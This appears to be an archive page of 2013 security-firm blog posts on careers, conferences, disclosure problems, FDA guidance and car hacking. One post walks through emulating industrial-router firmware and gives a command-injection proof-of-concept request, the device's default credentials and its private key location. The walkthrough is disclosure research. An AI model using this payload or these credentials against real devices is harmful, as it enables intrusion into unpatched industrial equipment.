INSIGHTS | October 16, 2013

A trip down cyber memory lane, or from C64 to #FF0000 teaming

So, it’s National Cyber Security Awareness Month, and here at IOActive we have been lining up some great content for you. Before we get to that, I was asked to put together a short post with some background on how I got into infosec, and what has kept me here for almost 20 years now.

Brace yourselves for a trip down memory lane then :-). For me, getting into security didn’t start with a particular event or decision. I’ve always been intrigued by how things worked, and I used to take things apart and sometimes also put them back together: Meccano, Lego, assorted electrical contraptions, radios, and so on. Things got a bit more serious when I was about 6 or 7, when I somehow managed to convince my parents to get me one of those newfangled computers. It was a Commodore 64 (we were late adopters at the Amit residence), but the upside was that I had a real floppy drive rather than a tape cassette 😉
That was my introduction to programming (and hacking). After going through all the available literature I could get my hands on in Hebrew, I switched over to English material (having to learn the language as I went along), and did a lot of basic programming (yes, BASIC programming). That’s also when I started to deal with basic software protection mechanisms.
Things got more real later on in my PC days, when I was getting back into programming after a long hiatus; I picked up this small project called Linux and tried to get it working on my PC. Later I realized that familiarity with kernel module development and debugging was worth something in the real world, in the form of security work.
Ever since then, I have found myself on a constant learning curve, always running into new technologies and new areas of interest that are tangential to information security. It’s what has been keeping my ADD satisfied, as I ventured into risk, international law, finance, economic research, psychology, hardware, physical security, and other areas that I’m probably forgetting in the edits to this post (have I mentioned ADD?).
I find it hard to define “what I like to research,” as my range of interests keeps expanding and venturing into different areas. Once it was a deep dive into Voice over IP and how it can be abused to exfiltrate data; another time it was exploring the business side of cyber-crime and how things worked there from an “economy” perspective; at other times it was purely defense-oriented, when I switched seats and worked with a large customer who needed to shore up their defenses properly. It even got weird at some point, when I dealt with the international legal implications of conflict in the 5th domain while working with NATO on some new advisories and guidance (law is FUN, and don’t let anyone tell you otherwise!).
I guess that for me it’s the mixture of technical and non-technical elements and how these apply in the real world… It kind of goes back to my alma-mater (The Interdisciplinary Center) where I had a chance to hone some of these research skills.
As for advice on how to become a pentester / researcher / practitioner of information security? Well, that’s a tough one. I’d say you need the basics, which for me has always meant an academic degree. Any kind of degree. I know a lot of people feel they aren’t “learning” anything new at university because they have already mastered Ruby, Python, C++, or whatever. That’s not the point. For me, academia provided tools rather than actual material (yes, I also breezed through the programming portions of college). But that wouldn’t be enough. You need something more than just skills to stay in the industry: a keen eye for detail, an inquisitive mind, at times I’d call it cunning, to explore things that are out of bounds. And sometimes a bit of moxie (chutzpah, as it’s called in Hebrew) to try things that you aren’t completely allowed to. But safely, of course 😉
Hope this makes sense, and maybe sheds some light on what got me here, and what keeps driving me ahead. Have a safe and enjoyable “Cyber” month! 🙂
INSIGHTS | October 15, 2013

IOActive supports National Cyber Security Awareness Month

The month of October has officially been deemed National Cyber Security Awareness Month (NCSAM). Ten years ago the US Department of Homeland Security and the National Cyber Security Alliance got together and began this commendable online security awareness initiative.  Why? Well, according to the Department of Homeland Security the NCSAM is seen as an opportunity to engage with businesses and the general public to create a ‘safe, secure and resilient cyber environment.’  This is something that resonates with the team here at IOActive.

The 10th anniversary of NCSAM looks ahead at the cyber security challenges for the next ten years. So, over the next few days and weeks we will be publishing some short blog posts from our researchers and consultants to show our support for this good cause.

The first round of posts – given that this week is slated to highlight the ‘cyber workforce and the next generation of cyber leaders’ – will be from our international research team giving insight into how they got into the world of cyber security. From getting their first computers, their studies through to what they enjoy most about security and why.

If anything, we hope these posts will help encourage our young generation to pick up their pens and their computers and explore the realm of cyber security.

 

So keep an eye out for these posts over the coming days. And if you have any questions or comments relating to the blog posts, please feel free to let us know. We welcome the discussion.
INSIGHTS | October 3, 2013

Seeing red – recap of SecurityZone, DerbyCon, and red teaming goodness

I was fortunate enough to have a chance to participate in a couple of conferences that I consider close to my heart in the past couple of weeks. First up was SecurityZone in beautiful Cali, Colombia. This is the third year that SecurityZone has been running, and it is slowly making its way into the Latin American security scene.

This year I delivered the keynote on the first day, and albeit being a bit harsh on the whole “let’s buy stuff so we can think we are secure” approach, it was very well received. Apparently, stating the “obvious” – that a security function in an organization is tasked with managing that organization’s risk, rather than purely with its technical IT infrastructure – still needs saying.
Next up was DerbyCon. I can’t stress enough how much fun it is to run the Red Teaming Training class with my best friend Chris, and the kind of feedback (and learning) we get a chance to receive. The biggest return for us every time we deliver the training is watching the trainees open up and really “get” what red team testing is all about, and the kind of value it brings to the organization being tested. That moment of enlightenment is still sheer joy for me.
Speaking of DerbyCon – OMG, what a conference! It’s just amazing what a small crew of dedicated individuals can come up with in such a short period of time. If you asked me how long this con has been running, I’d say at least 8-9 years. And this was just the third iteration. Everything worked, from the volunteer crew through the hotel staff (major kudos to the Hyatt for taking DerbyCon on and “working” with us – going well above just accommodating a conference venue).
My talk at DerbyCon focused on the “receiving end” of a red team: what an organization should do in order to thoroughly prepare for such an engagement and maximize its impact and returns, in the form of improved organizational efficiency and security posture. I had a lot of great feedback on it, and some excellent conversations with people who have been struggling to reach that “buy-in” point in their organizations. I really hope I managed to help a bit in figuring out how to more accurately convey the advantages and ROI of such an engagement to the different internal groups.
I’m really looking forward to getting more feedback on it, and more discussions on how to communicate the essence of red teaming to organizations – which is always a challenge in internal organization politics.
Following are the slides. Have fun!
INSIGHTS | September 10, 2013

Vulnerability bureaucracy: Unchanged after 12 years

One of my tasks at IOActive Labs is to deal with vulnerabilities: report them, try to get them fixed, publish advisories, and so on. This isn’t new to me. I started reporting vulnerabilities some 12 years ago, and over that time I have reported hundreds of vulnerabilities – many of them found by me, and many by other people.

Since the early 2000’s I have encountered several problems when reporting vulnerabilities:
  • Vendor not responding
  • Vendor responding aggressively
  • Vendor responding but choosing not to fix the vulnerability
  • Vendor releasing flawed patches or not patching some vulnerabilities at all
  • Vendor failing to meet deadlines they set themselves

It’s really sad to say that, as of right now, 12 years later, I continue to see most (if not all) of the same problems. Not only that, but some organizations that are supposed to help coordinate vulnerability reporting and disclosure (CERTs) are starting to fail, being unresponsive and not contributing much to the effort.

This wouldn’t be a big problem if we were reporting low-impact or unimportant vulnerabilities, but most of the time the team here at IOActive reports critical vulnerabilities affecting systems ranging from critical infrastructure to the most popular commercial applications, operating systems, and so on, used by millions of people around the world. There is a big responsibility on us to work with the affected vendors to get the vulnerabilities fixed, keeping in mind how bad things could be if they were exploited.

It’s also surprising to sometimes see tardy responses from teams that are supposed to act and respond fast, such as the Android security team, given that Google has some strong vulnerability policies.

It would be nice if most vendors, CERTs, etc. were aware of the following:
  • Independent researchers and security consulting companies report vulnerabilities on a voluntary basis.
  • Independent researchers and security consulting companies have no obligation to report security vulnerabilities.
  • Independent researchers and security consulting companies often invest a lot of time, effort and resources finding vulnerabilities and trying to get them fixed.
  • Vendors and CERTs should be more appreciative of the people reporting vulnerabilities and, at the very least, be more responsive than they typically are today.
  • Vendors and CERTs should adhere to and comply with their own defined deadlines.
I would like vendors and CERTs to start improving a little and becoming more responsive; the attack surface grows every day, and vulnerabilities affect our lives more and more. The more we depend on technology, the more vulnerabilities will impact us.

There shouldn’t be vulnerability bureaucracy.

If there’s one thing that vendors and CERTs could do to improve the situation, it would be to step up and be accountable for the vulnerability information entrusted to them.

 

I hope that in the following 12 years something will change for the better.
INSIGHTS | September 3, 2013

Emulating binaries to discover vulnerabilities in industrial devices

Emulating an industrial device in a controlled environment is a really helpful security tool. You can gain a better knowledge of how it works, identify potential attack vectors, and verify the vulnerabilities you discovered using static methods.
This post provides step-by-step instructions on how to emulate an industrial router with publicly available firmware. This is a pretty common case, so you should be able to apply this methodology to other scenarios.
The target is the Waveline family of industrial routers from the German automation vendor Weidmüller. The firmware is publicly available on the vendor’s website.
 
 
Firmware
Envision the firmware as a matryoshka doll, commonly known as a Russian nesting doll. Our goal is to find the interesting part in the firmware, the innermost doll, by going through the different outer layers. Binwalk will be our best friend for this task.
We found the following two files when we unzipped the firmware:
IE-AR-100T-WAVE_firmware
meta-inf.xml
 
$ tar -jxvf IE-AR-100T-WAVE_firmware
x deviceID
x IE-AR-100T-WAVE_uImage
We found a uImage firmware image, so now we scan it for embedded file systems.
$ binwalk IE-AR-100T-WAVE_uImage 
DECIMAL   HEX       DESCRIPTION
-------------------------------------------------------------------------------
0         0x0       uImage header, header size: 64 bytes, header CRC: 0x520DABFB, created: Tue Jun 30 09:32:08 2009, image size: 9070000 bytes, Data Address: 0x8000, Entry Point: 0x8000, data CRC: 0xD822B635, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: Linux-2.6.25.20
12891     0x325B    LZMA compressed data, properties: 0xD4, dictionary size: 1543503872 bytes, uncompressed size: 536870912 bytes
14096     0x3710    gzip compressed data, from Unix, last modified: Tue Jun 30 09:32:07 2009, max compression
4850352   0x4A02B0  gzip compressed data, has comment, comment, last modified: Fri Jan 12 11:25:10 2029
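As an aside, the uImage header that binwalk decodes here is a fixed 64-byte structure, so its fields can also be read directly; as a sketch, the payload size lives in bytes 12-15 (big-endian):

```shell
# Read the payload size from a uImage header: a 32-bit big-endian
# integer at byte offset 12 of the fixed 64-byte header.
uimage_size() {
  # $1 = path to a uImage file
  dd if="$1" bs=1 skip=12 count=4 2>/dev/null | od -An -tu1 |
    awk 'NF { print ($1 * 16777216) + ($2 * 65536) + ($3 * 256) + $4 }'
}
```

Run against the uImage above, this should agree with the “image size: 9070000 bytes” that binwalk reports.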
We use the handy option ‘--dd’ to extract the gz file located at offset 0x3710.
$ binwalk --dd=gzip:gz:1 IE-AR-100T-WAVE_uImage
Now we have 3710.gz, so we use ‘gunzip + binwalk’ one more time.
$ binwalk 3710 
DECIMAL   HEX       DESCRIPTION
-------------------------------------------------------------------------------
89440     0x15D60   gzip compressed data, from Unix, last modified: Tue Jun 30 09:31:59 2009, max compression
We extract the gzip blob at 0x15D60.
$ binwalk --dd=gzip:gz:1 3710
$ file 15D60 
15D60: ASCII cpio archive (SVR4 with no CRC)
As a last step, we create a new directory (‘ioafs’) where the contents of this cpio file will be extracted.
$ cpio -imv --no-absolute-filenames < 15D60
We finally have the original filesystem.
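Incidentally, the carving that ‘--dd’ performs is easy to reproduce by hand, which helps when binwalk isn’t available; a minimal sketch (offsets are the decimal values from the scans above):

```shell
# Extract a gzip member embedded at a byte offset inside a larger
# blob -- the same carving binwalk's --dd option performs for us.
carve_gzip() {
  # $1 = input blob, $2 = decimal byte offset, $3 = output file
  dd if="$1" bs=1 skip="$2" 2>/dev/null | gzip -dc > "$3"
}

# Equivalent to the binwalk step above (0x3710 = 14096):
#   carve_gzip IE-AR-100T-WAVE_uImage 14096 3710
```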
We look at an arbitrary file to see what platform it was built for.
Now we are ready to build an environment to execute those ARM binaries using QEMU user-mode emulation.
1. Compile QEMU statically.
./configure --static --target-list=armeb-linux-user --enable-debug
2. Copy the resulting binary from ‘armeb-linux-user/qemu-armeb’ to the target filesystem ‘ioafs/usr/bin’.
3. Copy the target’s lib directory (‘ioafs/lib’) into ‘/usr/gnemul/qemu-armeb’ (you may need to create this directory). This allows qemu-armeb’s user-mode emulation to use the target’s libraries.
4. Register the big-endian ARM ELF format with the kernel’s ‘binfmt_misc’ support.
$ echo ':armeb:M::\x7fELF\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28:\xff\xff\xff\xff\xff\xff\xff\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff:/usr/bin/qemu-armeb:' > /proc/sys/fs/binfmt_misc/register
5. Bind your ‘dev’ and ‘proc’ to the target environment.
$ mount -o bind /dev ioafs/dev
$ mount -t proc proc ioafs/proc
6. ‘chroot’ into our emulated device (‘ioafs’).
$ cd ioafs
$ chroot . bin/ash
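For repeated use, the steps above can be collected into a single helper. This is a sketch only (paths are illustrative, the whole thing needs root, and the binfmt string is the one from step 4), so the function is defined here rather than run:

```shell
# Sketch: prepare and enter a QEMU user-mode chroot for a big-endian
# ARM firmware tree. Requires root; paths are illustrative.
setup_qemu_chroot() {
  target="$1"  # e.g. ./ioafs, the extracted filesystem

  # Steps 2-3: static qemu into the tree, target libs where qemu looks
  cp armeb-linux-user/qemu-armeb "$target/usr/bin/"
  mkdir -p /usr/gnemul/qemu-armeb
  cp -a "$target/lib/." /usr/gnemul/qemu-armeb/

  # Step 4: register the armeb ELF magic with binfmt_misc
  echo ':armeb:M::\x7fELF\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28:\xff\xff\xff\xff\xff\xff\xff\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff:/usr/bin/qemu-armeb:' \
    > /proc/sys/fs/binfmt_misc/register

  # Steps 5-6: bind mounts, then chroot into the emulated device
  mount -o bind /dev "$target/dev"
  mount -t proc proc "$target/proc"
  cd "$target" && chroot . bin/ash
}
```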
Finding Vulnerabilities
 
From this point, hunting for vulnerabilities is pretty much the same as in any other *nix environment (check for proprietary services, accounts, etc.).
Today, almost all industrial devices have an embedded web server. Some of them use this interface to expose simple functionality for checking status, but others allow the operator to configure and control the device. The first thing to look for is a private key that could be used to implement MITM attacks.
Waveline routers use a well-known HTTP server, lighttpd. We look in ‘/etc/lighttpd’ and find the private key at ‘/etc/lighttpd/wm.pem’.
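This kind of hunt is easy to automate; a small sketch (the function name is ours) that sweeps an extracted tree for PEM-encoded private keys:

```shell
# Sweep an extracted firmware tree for embedded PEM private keys.
find_keys() {
  # $1 = root of the extracted filesystem (e.g. ./ioafs)
  grep -rl -- '-----BEGIN .*PRIVATE KEY-----' "$1" 2>/dev/null
}
```

Pointed at the ‘ioafs’ tree, this should flag ‘etc/lighttpd/wm.pem’ among its hits.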

We see that ‘/etc/init.d/S60httpd’ starts the lighttpd web server and can be used to configure its authentication.

If we decompress ‘/etc/ulsp_config.tgz’ we can find the SYSTEM_USER_PASS in ‘system.config’.
 
We have just discovered that the default credentials are ‘admin:detmold’.
We start the service and access the web interface.
We can now analyze the server’s DOCUMENT_ROOT (‘/home/httpd’) to see what kind of content is being served.
The operator can fully configure the device via several CGIs. We discover something interesting by reversing ‘config.cgi’.
As we can see in the menu, one of the options allows the operator to change the system time. However, this CGI was not designed with security in mind, and it allows an attacker to make other changes as well. The CGI does not filter the input data coming from the web interface, so the ‘system’ call can be invoked with arbitrary values, leading to a remote command injection vulnerability. If the operator is tricked into visiting a specially crafted website, this flaw can be exploited via CSRF.
Proof of Concept
POST /config.cgi HTTP/1.1
Host: nsa.prism
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,ar-jo;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

lang=englis&item=2&act=1&timemode=man&tzidx=0&jahr=2012&monat=|echo 1 >/home/httpd/amipowned&tag=07&std=21&min=00&sek=3
There are some additional vulnerabilities in this device, but those are left as an exercise for the reader.
These vulnerabilities were properly disclosed to the vendor, which decided not to release a patch due to the small number of devices actually deployed.
INSIGHTS | August 23, 2013

IE heaps at Nordic Security Conference

Remember when I used to be the Windows Heap guy? Yeah, me neither ;). I just wanted to give everyone a heads up regarding my upcoming presentation “An Examination of String Allocations: IE-9 Edition” at Nordic Security Conference (www.nsc.is). The presentation title is a bit vague so I figured I would give a quick overview.
First, I’ll briefly discuss the foundational knowledge regarding heap-based memory allocations using JavaScript strings in IE-6 and IE-7. These techniques for manipulating the heap are well documented and have been known for quite some time [1].

While heap spraying and allocation techniques have continued to be used, public documentation of such techniques has been lacking. I specifically remember Nico Waisman talking about using the DOM [2] to perform precise allocations, but I don’t recall specific details being released. Nico’s presentation inspired me to reverse engineer a small portion of IE-9’s JavaScript implementation when it came to string based memory manipulation techniques. (Editor’s note: I’ve been holding onto this for 2 years, WTF Chris?).

Next I’ll cover, in detail, the data structures and algorithms used in IE-9 that are common during the exploitation process when performing typical string manipulations. Hopefully the details will give insight into what actually happens for vanilla exploitation attempts.

Lastly, I’ll demo a library which I’m calling heapLib2. HeapLib2 is an extension of Alex Sotirov’s original heap library that will work with modern versions of Internet Explorer when requiring precise heap-based allocations. You can now do some neat memory tricks with a few simple lines.

 



One final reflection: if you haven’t been to Nordic Security Conference (or Iceland in general), you should consider going. The conference has an attentive but laid-back atmosphere while providing both highly technical and high-level security presentations. If you’ve been looking for an excuse to go to Iceland, get yourself to Nordic Security Conference!

 
[1] – http://www.phreedom.org/research/heap-feng-shui/
P.S. These techniques _MAY_ work with versions of IE that are greater than version 9

 

P.P.S. Ok, they DO work.
INSIGHTS | August 20, 2013

FDA Medical Device Guidance

Last week the US Food and Drug Administration (FDA) finally released a couple of important documents: the first being their guidance on using radio frequency wireless technology in medical devices (replacing a draft from January 3, 2007), and the second being their new (draft) guidance on premarket submissions for management of cybersecurity in medical devices.

The wireless technology guidance document seeks to address many of the risks and vulnerabilities that have been disclosed in medical devices (embedded or otherwise) in recent years – in particular those with embedded RF wireless functionality…

The recommendations in this guidance are intended for RF wireless medical devices including those that are implanted, worn on the body or other external wireless medical devices intended for use in hospitals, homes, clinics, clinical laboratories, and blood establishments.  Both wireless induction-based devices and radiated RF technology device systems are within the scope of this guidance.

The FDA wishes medical device manufacturers to consider the design, testing and use of wireless medical devices…

In the design, testing, and use of wireless medical devices, the correct, timely, and secure transmission of medical data and information is important for the safe and effective use of both wired and wireless medical devices and device systems. This is especially important for medical devices that perform critical functions such as those that are life-supporting or life-sustaining. For wirelessly enabled medical devices, risk management should include considerations for robust RF wireless design, testing, deployment, and maintenance throughout the life cycle of the product.

For most of you reading the IOActive Labs blog, the most important parts of the guidance document are the advice on security and securing “wireless signals and data”. Section 3.d covers this…

Security of RF wireless technology is a means to prevent unauthorized access to patient data or hospital networks and to ensure that information and data received by a device are intended for that device. Authentication and wireless encryption play vital roles in an effective wireless security scheme. While most wireless technologies have encryption schemes available, wireless encryption might need to be enabled and assessed for adequacy for the medical device’s intended use. In addition, the security measures should be well coordinated among the medical device components, accessories, and system, and as needed, with a host wireless network. Security management should also consider that certain wireless technologies incorporate sensing of like technologies and attempt to make automatic connections to quickly assemble and use a network (e.g., a discovery mode such as that available in Bluetooth™ communications). For certain types of wireless medical devices, this kind of discovery mode could pose safety and effectiveness concerns, for example, where automatic connections might allow unintended remote control of the medical device. 

FDA recommends that wireless medical devices utilize wireless protection (e.g., wireless encryption, data access controls, secrecy of the “keys” used to secure messages) at a level appropriate for the risks presented by the medical device, its environment of use, the type and probability of the risks to which it is exposed, and the probable risks to patients from a security breach. FDA recommends that the following factors be considered during your device design and development: 

* Protection against unauthorized wireless access to device data and control. This should include protocols that maintain the security of the communications while avoiding known shortcomings of existing older protocols (such as Wired Equivalent Privacy (WEP)). 

* Software protections for control of the wireless data transmission and protection against unauthorized access. 

Use of the latest up-to-date wireless encryption is encouraged. Any potential issues should be addressed either through appropriate justification of the risks based on your device’s intended use or through appropriate design verification and validation.

Based upon the parts I’ve highlighted above, you’ll probably be left with a sense of foreboding. From a “guidance” perspective, it’s less useful than a teenager with a CISSP qualification. The instructions are so general as to be useless.

If I were the geek charged with waving the security baton at some medical device manufacturer, I wouldn’t be happy at all. Effectively, the FDA is saying “there are a number of security risks with wireless technologies, here are some things you could think about doing, hope that helps.” Even if you followed all this advice, the FDA could turn around later during your submission for certification and say you did it wrong…

The second document the FDA released last week (Content of Premarket Submissions for Management of Cybersecurity in Medical Devices – Draft Guidance for Industry and Food and Drug Administration Staff) is a little more helpful – at the very least they’re talking about “cybersecurity” and there’s a little more meat for your CISSP folks to chew upon (in fact parts of it read like they’ve been copy-pasted right out of a CISSP training manual).

This guidance has been developed by the FDA to assist industry by identifying issues related to cybersecurity that manufacturers should consider in preparing premarket submissions for medical devices. The need for effective cybersecurity to assure medical device functionality has become more important with the increasing use of wireless, Internet- and network-connected devices, and the frequent electronic exchange of medical device-related health information.

Again, it doesn’t go into any real detail about what device manufacturers should or shouldn’t be doing, but it does set the scene for understanding the scope of part of the threat.

If I were an executive at one of the medical device manufacturers confronted with these FDA guidance documents for the first time, I wouldn’t feel particularly comforted by them – in fact, I’d be more worried about the increased exposure I would have in the future. If a future product of mine were hacked, regardless of how closely I thought I was following the FDA guidance, I’d be pretty sure the FDA could turn around and say that I wasn’t really in compliance.

With that in mind, let me slip on my IOActive CTO hat and clearly state that I’d recommend any medical device manufacturer that doesn’t want to get bitten in the future for failing to follow this FDA “guidance” reach out to a qualified security consulting company to get advice on (and to assess) the security of current and future product lines prior to release.

Engaging with a bunch of third-party experts isn’t just a CYA proposition for your company. Bringing to bear an external (impartial) security authority would obviously add extra weight to the approval process, proving the company’s technical diligence and working “above and beyond” the security checkbox of the FDA guidelines. Just as importantly though, securing wireless technologies against today’s and tomorrow’s threats isn’t something that can be done by an internal team (or a flock of CISSPs) – you really do need to call in the experts with a hacker’s eye for security… Ideally a company with a pedigree in cutting-edge security research, and I know just who to call…

INSIGHTS | August 5, 2013

Car Hacking: The Content

Hi Everyone, 
As promised, Charlie and I are releasing all of our tools and data, along with our white paper. We hope that these items will help others get involved in automotive security research. The paper is pretty refined but the tools are a snapshot of what we had. There are probably some things that are deprecated or do not work, but things like ECOMCat and ecomcat_api should really be all you need to start with your projects. Thanks again for all the support! 
 
Content: http://illmatics.com/content.zip

 

WHITEPAPER |

Car Hacking Made Affordable

This research focuses on reducing the barrier to entry for automotive security assessments. The goal is to increase the number of security researchers working in this area by providing step-by-step information on how to evaluate, test, and assess Electronic Control Units (ECUs) without requiring a vehicle.

To accomplish the work described in this paper, you only need inexpensive electronics and an ECU. Most, if not all, of the equipment and vehicle parts can be acquired from third-party sources, such as eBay or Amazon.


WHITEPAPER | July 31, 2013

Adventures in Automotive Networks and Control Units

Previous research has shown that an attacker can execute remote code on the electronic control units (ECUs) in vehicles via interfaces such as Bluetooth and the telematics unit: https://www.autosec.org/pubs/cars-usenixsec2011.pdf.

This paper expands on the topic and describes how an attacker can influence a vehicle’s behavior. It includes examples of mission critical controls, such as steering, braking, and acceleration, being manipulated using Controller Area Network (CAN) messages.